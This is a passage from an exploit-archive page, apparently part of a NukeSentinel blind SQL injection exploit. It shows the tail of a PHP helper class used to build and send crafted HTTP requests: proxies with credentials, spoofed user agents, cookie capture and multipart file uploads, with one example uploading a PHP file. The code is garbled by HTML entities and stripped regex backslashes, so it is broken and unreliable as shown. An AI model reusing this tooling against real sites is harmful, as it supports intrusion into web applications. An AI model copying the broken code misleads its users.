		//&nbsp;$this->addheader(\"name\",\"value\");
		if(!empty($headervalue))
		{
			if(!empty($this->header))
			{
				if(preg_match(\"/$headern:/\",$this->header))
				{
					$this->header&nbsp;=&nbsp;preg_replace(\"/$headern:&nbsp;(S*)/\",\"$headern:&nbsp;$headervalue\",$this->header);
				}
				else
				{
					$this->header&nbsp;.=&nbsp;\"
\".$headern.\":&nbsp;\".$headervalue;
				}
			}
			else
			{
				$this->header=$headern.\":&nbsp;\".$headervalue;
			}
		}
		//&nbsp;$this->addheader(\"name:&nbsp;value\");
		else&nbsp;
		{
			if(!empty($this->header))
			{
				$headarr&nbsp;=&nbsp;explode(\":&nbsp;\",$headern);
				$headern&nbsp;=&nbsp;$headarr[0];
				$headerv&nbsp;=&nbsp;$headarr[1];
				$this->addheader($headern,$headerv);
			}
			else
			{
				$this->header=$headern;
			}
		}
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server.
	&nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->proxy(\"proxyip\",\"8118\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->proxy(\"proxyip:8118\")
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyhost
	&nbsp;*&nbsp;@param&nbsp;integer&nbsp;$proxyport
	&nbsp;*/
	public&nbsp;function&nbsp;proxy($proxy,$proxyp=\'\')
	{
		//&nbsp;$this->proxy(\"localhost:8118\");
		if(empty($proxyp))
		{
			preg_match(\"/^(S*):(d+)$/\",$proxy,$proxarr);
			$proxh&nbsp;=&nbsp;$proxarr[1];
			$proxp&nbsp;=&nbsp;$proxarr[2];
			$this->proxyhost=$proxh;
			$this->proxyport=$proxp;
		}
		//&nbsp;$this->proxy(\"localhost\",8118);
		else&nbsp;
		{
			$this->proxyhost=$proxy;
			$this->proxyport=intval($proxyp);
		}
		if($this->proxyport&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\");
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server
	&nbsp;*&nbsp;which&nbsp;requires&nbsp;a&nbsp;basic&nbsp;authentification.&nbsp;Several
	&nbsp;*&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->proxyauth(\"darkfig\",\"dapasswd\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->proxyauth(\"darkfig:dapasswd\");
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyuser
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxypass
	&nbsp;*/
	public&nbsp;function&nbsp;proxyauth($proxyauth,$proxypasse=\'\')
	{
		//&nbsp;$this->proxyauth(\"darkfig:password\");
		if(empty($proxypasse))
		{
			preg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);
			$proxu&nbsp;=&nbsp;$proxautharr[1];
			$proxp&nbsp;=&nbsp;$proxautharr[2];
			$this->proxyuser=$proxu;
			$this->proxypass=$proxp;
		}
		//&nbsp;$this->proxyauth(\"darkfig\",\"password\");
		else
		{
			$this->proxyuser=$proxyauth;
			$this->proxypass=$proxypasse;
		}
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;set&nbsp;the&nbsp;\"User-Agent\"&nbsp;header.
	&nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;possible&nbsp;to&nbsp;do&nbsp;that:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->agent(\"Mozilla&nbsp;Firefox\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addheader(\"User-Agent:&nbsp;Mozilla&nbsp;Firefox\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addheader(\"User-Agent\",\"Mozilla&nbsp;Firefox\");
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$useragent
	&nbsp;*/
	public&nbsp;function&nbsp;agent($useragent)
	{
		$this->agent=$useragent;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;header&nbsp;which&nbsp;will&nbsp;be
	&nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->showheader();
	&nbsp;*
	&nbsp;*&nbsp;@return&nbsp;$header
	&nbsp;*/
	public&nbsp;function&nbsp;showheader()
	{
		return&nbsp;$this->header;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;cookie&nbsp;which&nbsp;will&nbsp;be
	&nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->showcookie();
	&nbsp;*
	&nbsp;*&nbsp;@return&nbsp;$storedcookies
	&nbsp;*/
	public&nbsp;function&nbsp;showcookie()
	{
		return&nbsp;$this->cookie;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;last&nbsp;formed
	&nbsp;*&nbsp;http&nbsp;request&nbsp;(the&nbsp;http&nbsp;packet).
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->showlastrequest();
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@return&nbsp;$last_http_request
	&nbsp;*/
	public&nbsp;function&nbsp;showlastrequest()
	{
		return&nbsp;$this->packet;
	}
	
	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the
	&nbsp;*&nbsp;GET&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->get(\"http://localhost\");
	&nbsp;*&nbsp;$this->get(\"http://localhost:888/xd/tst.php\");
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/
	public&nbsp;function&nbsp;get($url)
	{
		$this->target($url);
		$this->method=\"get\";
		return&nbsp;$this->sock();
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the
	&nbsp;*&nbsp;POST&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$postdata
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/	
	public&nbsp;function&nbsp;post($url,$data)
	{
		$this->target($url);
		$this->method=\"post\";
		$this->data=$data;
		return&nbsp;$this->sock();
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the
	&nbsp;*&nbsp;POST&nbsp;method&nbsp;using&nbsp;the&nbsp;multipart/form-data&nbsp;enctype.&nbsp;
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$array&nbsp;=&nbsp;array(
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\"http://localhost/upload.php\",
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_boundary&nbsp;=>&nbsp;\"123456\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"email\"&nbsp;=>&nbsp;\"[email protected]\",
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"varname\"&nbsp;=>&nbsp;array(
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_type&nbsp;=>&nbsp;\"image/gif\",&nbsp;&nbsp;&nbsp;#&nbsp;Optional
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_transfert&nbsp;=>&nbsp;\"binary\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_filename&nbsp;=>&nbsp;\"hello.php\",
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_content&nbsp;=>&nbsp;\"<?php&nbsp;echo&nbsp;\':)\';&nbsp;?>\"));
	&nbsp;*&nbsp;$this->formdata($array);
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;array&nbsp;$array
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/
	public&nbsp;function&nbsp;formdata($array)
	{
		$this->target($array[frmdt_url]);
		$this->method=\"formdata\";
		$this->data=\'\';
		if(!isset($array[frmdt_boundary]))&nbsp;$this->boundary=\"phpsploit\";
		else&nbsp;$this->boundary=$array[frmdt_boundary];
		foreach($array&nbsp;as&nbsp;$key&nbsp;=>&nbsp;$value)
		{
			if(!preg_match(\"#^frmdt_(boundary|url)#\",$key))
			{
				$this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\"
\";
				$this->data&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\"\".$key.\"\";\";
				if(!is_array($value))
				{
					$this->data&nbsp;.=&nbsp;\"

\".$value.\"
\";
				}
				else
				{
					$this->data&nbsp;.=&nbsp;\"&nbsp;filename=\"\".$array[$key][frmdt_filename].\"\";
\";
					if(isset($array[$key][frmdt_type]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Type:&nbsp;\".$array[$key][frmdt_type].\"
\";
					if(isset($array[$key][frmdt_transfert]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Transfer-Encoding:&nbsp;\".$array[$key][frmdt_transfert].\"
\";
					$this->data&nbsp;.=&nbsp;\"
\".$array[$key][frmdt_content].\"
\";
				}
			}
		}
		$this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\"--
\";
		return&nbsp;$this->sock();
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;server&nbsp;response
	&nbsp;*&nbsp;without&nbsp;the&nbsp;headers.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->getcontent($this->get(\"http://localhost/\"));
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->getcontent();
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response
	&nbsp;*&nbsp;@return&nbsp;$onlythecontent
	&nbsp;*/
	public&nbsp;function&nbsp;getcontent($code=\'\')
	{
		if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv;
		$content&nbsp;=&nbsp;explode(\"
\",$code);
		$onlycode&nbsp;=&nbsp;\'\';
		for($i=1;$i<count($content);$i++)
		{
			if(!preg_match(\"/^(S*):/\",$content[$i]))&nbsp;$ok&nbsp;=&nbsp;1;
			if($ok)&nbsp;$onlycode&nbsp;.=&nbsp;$content[$i].\"
\";
		}
		return&nbsp;$onlycode;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;headers&nbsp;of&nbsp;the&nbsp;server&nbsp;response
	&nbsp;*&nbsp;without&nbsp;the&nbsp;content.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->getheader();
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response
	&nbsp;*&nbsp;@return&nbsp;$onlytheheaders
	&nbsp;*/
	public&nbsp;function&nbsp;getheader($code=\'\')
	{
		if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv;
		$header&nbsp;=&nbsp;explode(\"
\",$code);
		$onlyheader&nbsp;=&nbsp;$header[0].\"
\";
		for($i=1;$i<count($header);$i++)
		{
			if(!preg_match(\"/^(S*):/\",$header[$i]))&nbsp;break;
			$onlyheader&nbsp;.=&nbsp;$header[$i].\"
\";
		}
		return&nbsp;$onlyheader;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;cookiejar()&nbsp;function.
	&nbsp;*&nbsp;It&nbsp;adds&nbsp;the&nbsp;value&nbsp;of&nbsp;the&nbsp;\"Set-Cookie\"&nbsp;header&nbsp;in&nbsp;the&nbsp;\"Cookie\"
	&nbsp;*&nbsp;header&nbsp;for&nbsp;the&nbsp;next&nbsp;request.&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response
	&nbsp;*/
	private&nbsp;function&nbsp;getcookie($code)
	{
		$carr&nbsp;=&nbsp;explode(\"
\",str_replace(\"
\",\"
\",$code));
		for($z=0;$z<count($carr);$z++)
		{
			if(preg_match(\"/set-cookie:&nbsp;(.*)/i\",$carr[$z],$cookarr))
			{
				$cookie[]&nbsp;=&nbsp;preg_replace(\"/expires=(.*)(GMT||UTC)(S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));
			}
		}

		for($i=0;$i<count($cookie);$i++)
		{
			preg_match(\"/(S*)=(S*)(|;)/\",$cookie[$i],$matches);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookn&nbsp;=&nbsp;$matches[1];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookv&nbsp;=&nbsp;$matches[2];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->addcookie($cookn,$cookv);
		}
&nbsp;&nbsp;&nbsp;&nbsp;}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions.
	&nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it.
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$urltarg
	&nbsp;*/
	private&nbsp;function&nbsp;target($urltarg)
	{
		if(!preg_match(\"/^http://(.*)//\",$urltarg))&nbsp;$urltarg&nbsp;.=&nbsp;\"/\";
		$this->url=$urltarg;
		
		$array&nbsp;=&nbsp;explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg)));
		$this->host=$array[0];

		preg_match(\"/:(d+)//\",$urltarg,$matches);
		$this->port=empty($matches[1])&nbsp;?&nbsp;80&nbsp;:&nbsp;$matches[1];
		
		$temp&nbsp;=&nbsp;str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg));
		preg_match(\"//(.*)//\",$temp,$matches);
		$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");
	
		if($this->port&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\");
	}
	
	
	/**
	&nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will
	&nbsp;*&nbsp;extract&nbsp;all&nbsp;\"Set-Cookie\"&nbsp;headers&nbsp;values
	&nbsp;*&nbsp;and&nbsp;it&nbsp;will&nbsp;automatically&nbsp;add&nbsp;them&nbsp;into&nbsp;the&nbsp;\"Cookie\"&nbsp;header
	&nbsp;*&nbsp;for&nbsp;all&nbsp;next&nbsp;requests.
	&nbsp;*
	&nbsp;*&nbsp;$this->cookiejar(1);&nbsp;//&nbsp;enabled
	&nbsp;*&nbsp;$this->cookiejar(0);&nbsp;//&nbsp;disabled
	&nbsp;*&nbsp;
	&nbsp;*/
	public&nbsp;function&nbsp;cookiejar($code)
	{
		if($code===0)&nbsp;$this->cookiejar=\'\';
		if($code===1)&nbsp;$this->cookiejar=1;
		else
		{
			$this->getcookie($code);
		}
	}


	/**
	&nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will
	&nbsp;*&nbsp;follow&nbsp;all&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->allowredirection(1);&nbsp;//&nbsp;enabled
	&nbsp;*&nbsp;$this->allowredirection(0);&nbsp;//&nbsp;disabled
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@return&nbsp;$this->get($locationresponse)
	&nbsp;*/
	public&nbsp;function&nbsp;allowredirection($code)
	{
		if($code===0)&nbsp;$this->allowredirection=\'\';
		if($code===1)&nbsp;$this->allowredirection=1;
		else
		{
			if(preg_match(\"/(location|content-location|uri):&nbsp;(.*)/i\",$code,$codearr))
			{
				$location&nbsp;=&nbsp;str_replace(chr(13),\'\',$codearr[2]);
				if(!eregi(\"://\",$location))
				{
					return&nbsp;$this->get(\"http://\".$this->host.$this->path.$location);
				}
				else
				{
					return&nbsp;$this->get($location);
				}
			}
			else
			{
				return&nbsp;$code;
			}
		}
	}
	
	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;reset&nbsp;some&nbsp;parameters:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->reset(header);&nbsp;//&nbsp;headers&nbsp;cleaned
	&nbsp;*&nbsp;$this->reset(cookie);&nbsp;//&nbsp;cookies&nbsp;cleaned
	&nbsp;*&nbsp;$this->reset();&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;clean&nbsp;all&nbsp;parameters
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$func
	&nbsp;*/
	public&nbsp;function&nbsp;reset($func=\'\')
	{
		switch($func)
		{
			case&nbsp;\"header\":
			$this->header=\'\';
			break;
			
			case&nbsp;\"cookie\":
			$this->cookie=\'\';
			break;
			
			default:
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookiejar=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->header=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookie=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->allowredirection=\'\';&nbsp;
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->agent=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
		}
	}
}
?>&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1
nukesentinelblind sql injectionexploitphp conditionscms conditionscreditsurlusageoptions
48